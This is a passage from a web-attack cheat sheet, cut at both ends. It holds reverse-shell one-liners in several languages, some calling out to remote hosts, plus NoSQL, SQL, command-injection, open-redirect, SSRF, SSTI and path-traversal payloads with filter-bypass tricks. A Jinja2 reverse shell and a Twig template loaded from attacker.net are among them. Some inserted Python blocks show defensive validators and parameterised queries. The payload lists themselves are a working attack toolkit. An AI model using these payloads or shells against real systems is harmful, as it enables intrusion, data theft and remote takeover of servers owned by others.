x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
Powershell
1、powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
2、powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
3、powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
NodeJS
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

11. NoSQL injection

Exploit

Authentication bypass with $ne / $gt
in URL
username[$ne]=toto&password[$ne]=toto
in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
Get the length
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
Extract data
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
or
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}

NoSQL blind injection

import string
import requests
import urllib3

urllib3.disable_warnings()
u = "https://example.com/login"   # target endpoint; placeholder, the original snippet left it undefined
username = "admin"
password = ""
while True:
    for c in string.printable:
        # skip regex metacharacters so the prefix is matched literally
        if c not in ['*', '+', '.', '?', '|']:
            payload = '{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data={'ids': payload}, verify=False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password + c))
                password += c

MongoDB Payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
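The URL payloads in this section only work because frameworks such as Express with `qs`, PHP and Rails turn `username[$ne]=toto` into a nested object that then reaches the query unchanged. The example below, added here and not code from the notes or the repository, models that parsing step and shows the two checks that stop it: credentials must be plain strings, and no key at any depth may begin with `$`. The `$eq` wrapping in the built query is an assumption about the backing MongoDB driver.

```python
from typing import Optional, Tuple
from urllib.parse import parse_qsl

def parse_bracket_qs(query: str) -> dict:
    """Model the nested parsing that turns username[$ne]=toto into {'username': {'$ne': 'toto'}}."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key[:-1].split("[", 1)
            out.setdefault(base, {})[sub] = value
        else:
            out[key] = value
    return out

def contains_operator(doc) -> bool:
    """True if any key at any depth starts with '$' ($ne, $gt, $regex, $where ...)."""
    if isinstance(doc, dict):
        return any(str(k).startswith("$") or contains_operator(v) for k, v in doc.items())
    if isinstance(doc, list):
        return any(contains_operator(v) for v in doc)
    return False

def credentials_from(body: dict) -> Optional[Tuple[str, str]]:
    """Accept the login only when both fields are plain strings; objects never reach the query."""
    user, pw = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return user, pw

def build_login_query(body: dict) -> Optional[dict]:
    """The filter a safe handler would hand to find_one(), or None if the request is refused."""
    creds = credentials_from(body)
    if creds is None or contains_operator(body):
        return None
    return {"username": {"$eq": creds[0]}, "password": {"$eq": creds[1]}}
```

The type check alone defeats the `$regex` character-by-character extraction above, since a regex can only be expressed as an object. Storing a password hash rather than the password makes a successful extraction far less useful as well.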

12. Open redirect

Exploit

1. Bypass using a whitelisted domain name
www.whitelisted.com.evil.com
2. Bypass the 'javascript' blacklist keyword with CRLF
java%0d%0ascript%0d%0a:alert(0)
3. Bypass the 'http' blacklist keyword with '//'
//baidu.com
4. Bypass the '//' blacklist keyword with 'https:'
https:baidu.com
5. Bypass the '//' blacklist keyword with '\/\/'
\/\/baidu.com/
/\/baidu.com/
6. Bypass the '.' blacklist keyword with '%E3%80%82'
//baidu%E3%80%82com
7. Bypass the blacklist with '%00'
//baidu%00.com
8. Bypass with parameter pollution
?next=whitelisted.com&next=baidu.com
9. Bypass with '@'
http://whitelisted.com@baidu.com/
10. Bypass with directory paths
http://www.baidu.com/http://www.whitelisted.com/
http://www.baidu.com/folder/www.whitelisted.com
11. XSS via the open URL (when it lands in a JS variable)
";alert(0);//
12. XSS via the data: protocol
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
13. XSS via the javascript: protocol
http://www.example.com/redirect.php?url=javascript:prompt(1)
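A redirect-target validator that holds up against the thirteen tricks above, added here as an example (not code from the notes or the repository). It takes the opposite approach to a keyword blacklist: after decoding, only two shapes are accepted, a same-site path beginning with a single `/`, or an absolute `http(s)` URL whose parsed hostname is in an allow-list. `ALLOWED_HOSTS` is a constructed list for the example.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_HOSTS = {"www.whitelisted.com", "whitelisted.com"}   # constructed allow-list

def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Return raw if it is a safe redirect target, otherwise the default landing page."""
    target = unquote(raw)
    # Control characters (java%0d%0ascript, %00) and backslashes (\/\/host, /\/host) are
    # rejected before parsing: urlsplit silently strips some of them.
    if any(ord(c) < 0x20 for c in target) or "\\" in target:
        return default
    parts = urlsplit(target)
    if parts.scheme:
        # javascript:, data:, and scheme-without-authority forms such as https:baidu.com
        if parts.scheme not in ("http", "https") or not parts.netloc:
            return default
    if parts.netloc:
        # userinfo trick: in http://whitelisted.com@baidu.com the hostname is baidu.com
        if "@" in parts.netloc or parts.hostname not in ALLOWED_HOSTS:
            return default
        return target
    # no scheme and no authority: accept only an in-site path, never '//host'
    if target.startswith("/") and not target.startswith("//"):
        return target
    return default
```

Parameter pollution (trick 8) is handled outside this function: the handler must read exactly one value for `next` and fail closed if the framework hands it a list.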

Common parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

13. Remote command execution

Command separators

ps;ls
ps&ls
ps&&ls
ps|ls
fail_command||ls

Embedded commands (command substitution)

other_command `cat /etc/passwd`
other_command $(cat /etc/passwd)

Bypassing spaces - Linux

cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/80
IFS=,;`cat<<<uname,-a`

Bypassing spaces - Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Wildcards

Common wildcards
*
?
[]
[-]
[^]
[!]
{str1,str2,…}
Wildcard-only paths
...
/???/??t /???/p??s??

Bypass via zsh/bash/sh ($0)

echo $0
-> /usr/bin/zsh
echo whoami|$0

Other bypasses

Single quotes
w'h'o'am'i
Double quotes
w"h"o"am"i
Backslashes and slashes
w\ho\am\i
/\b\i\n/////s\h
Using $@
who$@ami
Variable expansion
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
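Every separator, substitution and space-bypass trick in this section needs a shell to interpret the string. The example below, added here and not code from the notes or the repository, contrasts the vulnerable pattern (building one command string for `shell=True`) with the hardened one (strict allow-list validation of the value, then an argv list so no shell is involved), and includes the metacharacter rule a WAF or log search would use. The hostname regex is the RFC 1123 shape and is the assumption that makes the argv path safe.

```python
import re
import subprocess

# A hostname as RFC 1123 allows it: labels of letters, digits and hyphens, joined by dots.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
# Every trick above relies on at least one of these characters (or on whitespace/$IFS).
SHELL_META = re.compile(r"[;&|`$(){}<>\\'\"\s]")

def ping_command_vulnerable(host: str) -> str:
    """What a shell=True call hands to /bin/sh: `ps;ls`, `$(...)` and `{cat,/etc/passwd}` all survive."""
    return f"ping -c 1 {host}"

def ping_argv(host: str) -> list:
    """Hardened: allow-list the value, then build an argv list so no shell ever parses it."""
    if not HOSTNAME.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return ["ping", "-c", "1", host]

def run_ping(host: str) -> subprocess.CompletedProcess:
    """Executes the hardened form; never shell=True."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=10)

def looks_like_injection(value: str) -> bool:
    """Cheap WAF/log rule: does the value carry any shell metacharacter?"""
    return bool(SHELL_META.search(value))

def accepted(values) -> dict:
    """Which of the given values the hardened path would accept (useful in a review or a test)."""
    result = {}
    for v in values:
        try:
            ping_argv(v)
            result[v] = True
        except ValueError:
            result[v] = False
    return result
```

The regex rule is for detection only; the argv list plus validation is what removes the vulnerability, since a single-quote or `$@` variant still passes through any blacklist that merely looks for spaces.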

14. SQL injection

Detection characters

'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP

DBMS fingerprinting

["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"]
["connection_id()=connection_id()" ,"MYSQL"]
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"]
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"]
["@@CONNECTIONS>0" ,"MSSQL"]
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"]
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"]
["USER_ID(1)=USER_ID(1)" ,"MSSQL"]
["ROWNUM=ROWNUM" ,"ORACLE"]
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"]
["LNNVL(0=123)" ,"ORACLE"]
["5::int=5" ,"POSTGRESQL"]
["5::integer=5" ,"POSTGRESQL"]
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"]
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"]
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"]
["current_database()=current_database()" ,"POSTGRESQL"]
["sqlite_version()=sqlite_version()" ,"SQLITE"]
["last_insert_rowid()>1" ,"SQLITE"]
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"]
["val(cvar(1))=1" ,"MSACCESS"]
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"]
["cdbl(1)=cdbl(1)" ,"MSACCESS"]
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]

Automated attack with sqlmap

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

Authentication bypass

'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Authentication bypass (raw MD5)

Example:
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
We only need to find a string whose md5($password,true) contains ' or '[...]
md5("ffifdyop", true) = 'or'6�]��!r,��b�

WAF bypass

Bypassing spaces
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
Comments
?id=1/*comment*/and/**/1=1/**/--
Parentheses
?id=(1)and(1)=(1)--
Bypassing commas
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
Equivalent operators
AND -> &&
OR -> ||
= -> LIKE,REGEXP, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
Bypassing information_schema.tables
select * from mysql.innodb_table_stats;
// select @@innodb_version;
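A runnable illustration of the authentication-bypass and raw-MD5 cases above against an in-memory SQLite database, added here as an example (not code from the notes or the repository). The vulnerable login builds the query by string concatenation exactly like the PHP line in the raw-MD5 example, so both `admin' or '1'='1` and the `ffifdyop` digest (whose first bytes are `'or'6`) log in; the parameterised version sends the same values as bound parameters and neither works. The credentials are constructed.

```python
import hashlib
import sqlite3

def raw_md5_text(password: str) -> str:
    """md5($password, true): the 16 raw digest bytes, carried as Latin-1 text like PHP does."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")

def setup_db() -> sqlite3.Connection:
    """Constructed admin table; 'pass' holds the raw MD5 digest of the password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", raw_md5_text("correct horse")))
    return conn

def login_vulnerable(conn, user: str, password: str):
    """String concatenation: both the quote payloads and the raw-MD5 trick change the WHERE clause."""
    sql = f"SELECT user FROM admin WHERE user = '{user}' AND pass = '{raw_md5_text(password)}'"
    return conn.execute(sql).fetchone()

def login_safe(conn, user: str, password: str):
    """Bound parameters: the values are compared, never parsed as SQL."""
    return conn.execute("SELECT user FROM admin WHERE user = ? AND pass = ?",
                        (user, raw_md5_text(password))).fetchone()
```

With `ffifdyop` the concatenated clause becomes `pass = ''or'6...'`, and the string literal `'6...'` is numerically true, which is the whole trick. Parameterisation fixes the injection; replacing unsalted MD5 with a password hash such as bcrypt or Argon2 fixes the rest of that line.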

15. SSRF

Exploit

SSRF can be used to attack internal Redis, Discuz, FastCGI, uWSGI, memcache, Struts2, intranet systems, Docker, Kubernetes, Hadoop, MySQL and so on.
1. Basic usage
http://localhost:80
http://0.0.0.0:22
2. Using redirection
Point a subdomain's DNS A record at the internal IP you want to probe, e.g. 127.0.0.1
http://wwww.example.com/index.php?url=http://ssrf.w2n1ck.com
3. Using file upload
Change "type=file" to "type=url"
then supply an internal address
4. XSS
http://brutelogic.com.br/poc.svg -> simple alert
http://wwww.example.com/index.php?url=http://brutelogic.com.br/poc.svg

Bypass

1. Use HTTPS
https://localhost/
2. Use [::]
http://[::]:80/
http://0000::1:80/
3. Use redirecting DNS names
localtest.me
127.0.0.1.xip.io
www.owasp.org.127.0.0.1.xip.io
customer1.app.localhost.my.company.127.0.0.1.nip.io
4. Use CIDR (not sure whether something has to be configured; I did not get this to work)
127.x.x.x
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://mail.ebc.apple.com => 127.0.0.6 => localhost
5. Use malformed URLs
localhost:+11211aaa
localhost:00011211aaaa
Reference: https://low-level.readthedocs.io/en/latest/documents/SSRFbible.Cheatsheet.pdf
6. Use other number bases
Hexadecimal, octal and so on.
115.239.210.26 >>> 16373751032
First convert each of the four octets to hexadecimal: 73 ef d2 1a
Then convert 73efd21a as a whole into octal
Remember to prefix the value with 0 when requesting it to mark it as octal (one zero or several, just like adding extra zeros to bypass filters in XSS); prefix hexadecimal with 0x
http://127.0.0.1 >>> http://0177.0.0.1/
http://127.0.0.1 >>> http://2130706433/
http://192.168.0.1 >>> http://3232235521/
http://192.168.1.1 >>> http://3232235777/
7. Use special addresses
http://0/
8. Use @
http://wwww.example.com@www.baidu.com
http://wwww.example.com\x40www.baidu.com
http://wwww.example.com%40www.baidu.com
Combining tricks:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 + httplib: 1.1.1.1
requests + browsers: 2.2.2.2
urllib: 3.3.3.3
9. Use enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
10. Exploit URL parser differences
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
Reference: https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
11. Use other protocols
File protocol
file:///etc/passwd
file://\/\/etc/passwd
Dict protocol
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP protocol
ssrf.php?url=sftp://example.com:11111/
TFTP protocol
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP protocol
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher protocol
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
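An outbound-URL check that closes the bypasses in this section, added here as an example (not code from the notes, the repository or SSRFmap). It allows only `http(s)`, rejects userinfo and backslashes, canonicalises the host with NFKC (so the enclosed alphanumerics form becomes `example.com`), parses the decimal/octal/hex IPv4 spellings the way `inet_aton` does, resolves names through an injectable resolver, and blocks any address that is loopback, private, link-local, multicast, reserved or unspecified. The resolver used in the test is a constructed stand-in so the example runs offline.

```python
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

def parse_legacy_ipv4(host: str):
    """inet_aton-style parsing: 2130706433, 0177.0.0.1, 0x7f.1, 0 ... or None if not that shape."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = []
    for p in parts:
        try:
            if p[:2].lower() == "0x":
                v = int(p[2:], 16)
            elif len(p) > 1 and p[0] == "0":
                v = int(p, 8)
            else:
                v = int(p, 10)
        except ValueError:
            return None
        vals.append(v)
    *lead, last = vals
    span = 4 - len(lead)                       # the last component fills the remaining bytes
    if any(not 0 <= v <= 255 for v in lead) or not 0 <= last < 256 ** span:
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << (8 * span)) | last)

def host_to_ips(host: str, resolve=None) -> list:
    """Every IP address the host denotes, after canonicalising its spelling."""
    host = unicodedata.normalize("NFKC", host).lower()   # ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ -> example.com
    legacy = parse_legacy_ipv4(host)
    if legacy is not None:
        return [legacy]
    try:
        return [ipaddress.ip_address(host)]   # plain IPv4/IPv6, including :: and ::1
    except ValueError:
        pass
    if resolve is None:
        resolve = lambda h: sorted({ai[4][0] for ai in socket.getaddrinfo(h, None)})
    return [ipaddress.ip_address(a) for a in resolve(host)]

def is_blocked_ip(ip) -> bool:
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified)

def check_outbound_url(url: str, resolve=None) -> str:
    """'allowed' or a 'blocked: ...' reason for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "blocked: scheme"              # file:, dict:, gopher:, sftp:, tftp:, ldap: ...
    if "@" in parts.netloc or "\\" in url:
        return "blocked: userinfo or backslash in URL"
    host = parts.hostname
    if not host:
        return "blocked: no host"
    try:
        ips = host_to_ips(host, resolve)
    except (ValueError, OSError) as exc:      # socket.gaierror is an OSError
        return f"blocked: unresolvable ({type(exc).__name__})"
    for ip in ips:
        if is_blocked_ip(ip):
            return f"blocked: {host} -> {ip}"
    return "allowed"
```

Two things the check cannot do on its own: the fetch must connect to the address that was checked (otherwise DNS rebinding between check and use defeats it), and HTTP redirects must not be followed automatically, since bypass 2 and 3 rely on a public name redirecting or resolving to an internal one after the first hop.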

Tools

SSRFmap - https://github.com/swisskyrepo/SSRFmap
Gopherus - https://github.com/tarunkant/Gopherus
http://blog.w2n1ck.com/ip.py

16. SSTI

Ruby

<%= 7 * 7 %> => 49
<%= File.open('/etc/passwd').read %> => cat /etc/passwd
<%= Dir.entries('/') %> => ls /

Java

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
Get the system environment variables:
${T(java.lang.System).getenv()}
Read /etc/passwd:
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Twig

{{7*7}} == {{7*'7'}} == 49
Command execution:
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Smarty

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Jinja2

{{4*4}}[[5*5]]
{{7*'7'}} => 7777777
List the available classes
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
Dump the config variables
{% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
Read a file
''.__class__.__mro__[2].__subclasses__()[40] is the file class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
Write a file
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/hello.txt', 'w').write('Hello here !') }}
Reverse shell
1. Configure
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
2. Load it
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
3. Connect
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

Tools

Tplmap - https://github.com/epinna/tplmap
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade

17. CSTI

AngularJS

$eval('1+1')
{{1+1}}

Vue JS

{{constructor.constructor('alert(1)')()}}

18. Directory Traversal

1. Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2. Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
3. Double URL encoding
. = %252e
/ = %252f
\ = %255c
4. UTF-8 Unicode encoding
